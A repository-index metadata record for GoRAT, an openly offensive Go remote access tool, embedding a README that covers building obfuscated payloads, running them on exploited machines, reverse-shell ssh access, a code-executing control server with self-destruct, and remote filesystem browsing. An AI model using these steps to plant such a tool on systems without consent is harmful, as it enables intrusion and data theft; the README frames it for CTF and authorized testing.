{"id":15148759,"url":"https://github.com/justintimperio/gorat","last_synced_at":"2025-10-24T05:30:35.227Z","repository":{"id":57615416,"uuid":"380107881","full_name":"JustinTimperio/GoRAT","owner":"JustinTimperio","description":"GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.","archived":false,"fork":false,"pushed_at":"2022-01-03T17:55:16.000Z","size":6354,"stargazers_count":63,"open_issues_count":1,"forks_count":14,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-02-01T13:38:14.938Z","etag":null,"topics":["android","arm","arm64","ctf","file-server","freebsd","golang","https","linux","macos","mips","openbsd","pentesting","reverse-shell","windows","x86"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JustinTimperio.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-06-25T02:57:20.000Z","updated_at":"2025-01-08T02:08:01.000Z","dependencies_parsed_at":"2022-09-13T16:01:21.569Z","dependency_job_id":null,"html_url":"https://github.com/JustinTimperio/GoRAT","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JustinTimperio%2FGoRAT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JustinTimperio%2FGoRAT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JustinTimperio%2FGoRAT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JustinTimperio%2FGoRAT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JustinTimperio","download_url":"https://codeload.github.com/JustinTimperio/GoRAT/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":237915423,"owners_count":19386724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","arm","arm64","ctf","file-server","freebsd","golang","https","linux","macos","mips","openbsd","pentesting","reverse-shell","windows","x86"],"created_at":"2024-09-26T13:22:43.579Z","updated_at":"2025-10-24T05:30:29.749Z","avatar_url":"https://github.com/JustinTimperio.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"```\n @@@@@@@@   @@@@@@   @@@@@@@    @@@@@@   @@@@@@@  \n@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@  \n!@@        @@!  @@@  @@!  @@@  @@!  @@@    @@!    \n!@!        !@!  @!@  !@!  @!@  !@!  @!@    !@!    \n!@! @!@!@  @!@  !@!  @!@!!@!   @!@!@!@!    @!!    \n!!! !!@!!  !@!  !!!  !!@!@!    !!!@!!!!    !!!    \n:!!   !!:  !!:  !!!  !!: :!!   !!:  !!!    !!:    \n:!:   !::  :!:  !:!  :!:  !:!  :!:  !:!    :!:    \n ::: ::::  ::::: ::  ::   :::  ::   :::     ::    \n :: :: :    : :  :    :   : :   :   : :     :     \n```\n![GitHub](https://img.shields.io/github/license/JustinTimperio/GoRAT)\n[![Go Reference](https://pkg.go.dev/badge/github.com/JustinTimperio/GoRAT.svg)](https://pkg.go.dev/github.com/JustinTimperio/GoRAT)\n![Go Report Card](https://goreportcard.com/badge/github.com/JustinTimperio/GoRAT)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/d343e4d027164076a630448e3102fbf7)](https://www.codacy.com/gh/JustinTimperio/GoRAT/dashboard?utm_source=github.com\u0026amp;utm_medium=referral\u0026amp;utm_content=JustinTimperio/GoRAT\u0026amp;utm_campaign=Badge_Grade)\n\nGoRAT(Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and designed for CTF players, Go enthusiasts, and security experts.)\n### Supported Distros:\n\n| 64Bit Distros       | 32Bit Distros                 |\n|---------------------|-------------------------------|\n| Linux               | Linux                         |\n| FreeBSD             | FreeBSD                       |\n| OpenBSD             | OpenBSD                       |\n| Linux ARM           | Linux ARM                     |\n| FreeBSD ARM         | FreeBSD ARM                   |\n| OpenBSD ARM         | OpenBSD ARM                   |\n| Linux MIPS          | Linux MIPS                    |\n| MacOS               | (NOT BUILDING) MacOS          |\n| Android ARM         | (NOT BUILDING) Android ARM    |\n| Windows (kinda)     | Windows (kinda)               |\n\n# Installing and Building Native\n1. Set up a full GoLang build environment\n2. Install [UPX](https://upx.github.io/) \n3. Install [Garble](https://github.com/burrowers/garble) with `go get mvdan.cc/garble`\n4. Fill out `config.sh`\n5. Run `./build_payload.sh --all`\n\n# Installing and Building with Docker\n1. Install and start docker\n2. Fill out `config.sh` \n3. Run `./build_payload.sh --docker`\n\n# Using the Payloads\n1. Transfer the `BUILD` folder to your \"attacking\" machine, install [bc](https://linux.die.net/man/1/bc) and run `./start_server.sh`\n2. Exploit your system and run the binary\n3. Connect to the \"target\" via normal ssh from the \"attacking\" machine\n\n# Chisel Server Usage\nGoRAT uses the standard release binaries provided by the [chisel project](https://github.com/jpillora/chisel/releases). The server requires a number of configure options and has fairly verbose logging. For this reason a small shell script is provided to start and parse the output of chisel for easy use. To use it, run the following:\n1. `cd server` \n2. `./start_server.sh` \n\nAs clients connect you will see a log like this. We will use this log to access each clients SSH Server, HTTP File Server, and HTTP Control Server.\n```\nmr.robot@localhost:~# ./start_server.sh \nStarting Chisel Server on Port 1337\n=============================================\nSession #1 | Control Server Mounted On: 27818\nSession #1 | SSH Server Mounted On: 27819\n=============================================\nSession #2 | Control Server Mounted On: 33132\nSession #2 | SSH Server Mounted On: 33133\n```\n\n# Payload Usage\nAs with many Go binaries, client executables require zero configure and simply need to be executed. In its current state GoRAT does not include any methods of persistence so if you would like to make it a service, you will need to do so by your own methods.\n\nThe payload also uses [garble](https://github.com/burrowers/garble) to produce a binary that works as well as a regular build, but has as little information about the original source code as possible.\n\n## SSH Server (Linux, FreeBSD, Darwin, OpenBSD)\nUsing the logs we can connect to clients directly via ssh using our standard unix OpenSSH package.\n```\nssh localhost -p ####\n```\n\n## WSSH Windows (The Problem Child)\n*WARNING THE WINDOWS SHELL IS TERRIBLE, THIS WAS JUST AN EXPERIMENT*\n\nPlease check out this thread: https://github.com/creack/pty/pull/109#issuecomment-864673714\n\nWhen connecting to Windows hosts the following command will not work as GoRAT does not have a Windows PTY. For Windows systems we connect using a custom wrapper written for GoRAT.\n\n```\ncd wssh\ngo build wssh.go\n./wssh.go\n```\n\n## Control Server\nThe control server is a simple http mechanism that translates `/some-page` to internal go commands. In this way, requesting a webpage results directly in the execution of code on a client system. While this mechanism is not very sophisticated, it is extremely reliable and performant. The api current has the following commands:\n\n1. `http://localhost:port/` - Returns a status code of `OK` if the host is online and responding to requests\n2. `http://localhost:port/hardware` - Reports basic hardware survey of device in json \n3. `http://localhost:port/stop` - Closes the client payload WITHOUT self-destruction\n4. `http://localhost:port/uninstall` - Terminates the client payload AND self-destructs\n\n## File Server\nEach client's file server can be accessed on the same port as the control server. The file server is, from a technical standpoint, directly part of Control Server. Files and directories can be accessed at `http://localhost:####/fs/` through your browser or tools like `wget` and `curl`.\n\n\n```\n[robot@localhost ~]$ curl localhost:14963/fs/\n\u003cpre\u003e\n\u003ca href=\"bin\"\u003ebin\u003c/a\u003e\n\u003ca href=\"boot/\"\u003eboot/\u003c/a\u003e\n\u003ca href=\"dev/\"\u003edev/\u003c/a\u003e\n\u003ca href=\"etc/\"\u003eetc/\u003c/a\u003e\n\u003ca href=\"home/\"\u003ehome/\u003c/a\u003e\n\u003ca href=\"keybase/\"\u003ekeybase/\u003c/a\u003e\n\u003ca href=\"lib\"\u003elib\u003c/a\u003e\n\u003ca href=\"lib64\"\u003elib64\u003c/a\u003e\n\u003ca href=\"lost+found/\"\u003elost+found/\u003c/a\u003e\n\u003ca href=\"mnt/\"\u003emnt/\u003c/a\u003e\n\u003ca href=\"opt/\"\u003eopt/\u003c/a\u003e\n\u003ca href=\"proc/\"\u003eproc/\u003c/a\u003e\n\u003ca href=\"root/\"\u003eroot/\u003c/a\u003e\n\u003ca href=\"run/\"\u003erun/\u003c/a\u003e\n\u003ca href=\"sbin\"\u003esbin\u003c/a\u003e\n\u003ca href=\"srv/\"\u003esrv/\u003c/a\u003e\n\u003ca href=\"sys/\"\u003esys/\u003c/a\u003e\n\u003ca href=\"test/\"\u003etest/\u003c/a\u003e\n\u003ca href=\"tmp/\"\u003etmp/\u003c/a\u003e\n\u003ca href=\"usr/\"\u003eusr/\u003c/a\u003e\n\u003ca href=\"var/\"\u003evar/\u003c/a\u003e\n\u003c/pre\u003e\n```\n\n\n# Architecture\nGoRAT uses [chisel](https://github.com/jpillora/chisel) and [gliderlabs ssh server](https://github.com/gliderlabs/ssh) to create a high performance remote reverse tunnel over HTTPS. The diagram below shows how GoRAT establishes a link between multiple “targets” and a single “attacker”. \n![image](goRAT_Architecture.jpg)\n\n\n# Disclaimer\nUse of GoRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. We assume no liability and are not responsible for any misuse or damage caused by this software. Only use for educational purposes / ethical hacking. Multiple tools in this software include their own license.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjustintimperio%2Fgorat","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjustintimperio%2Fgorat","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjustintimperio%2Fgorat/lists"}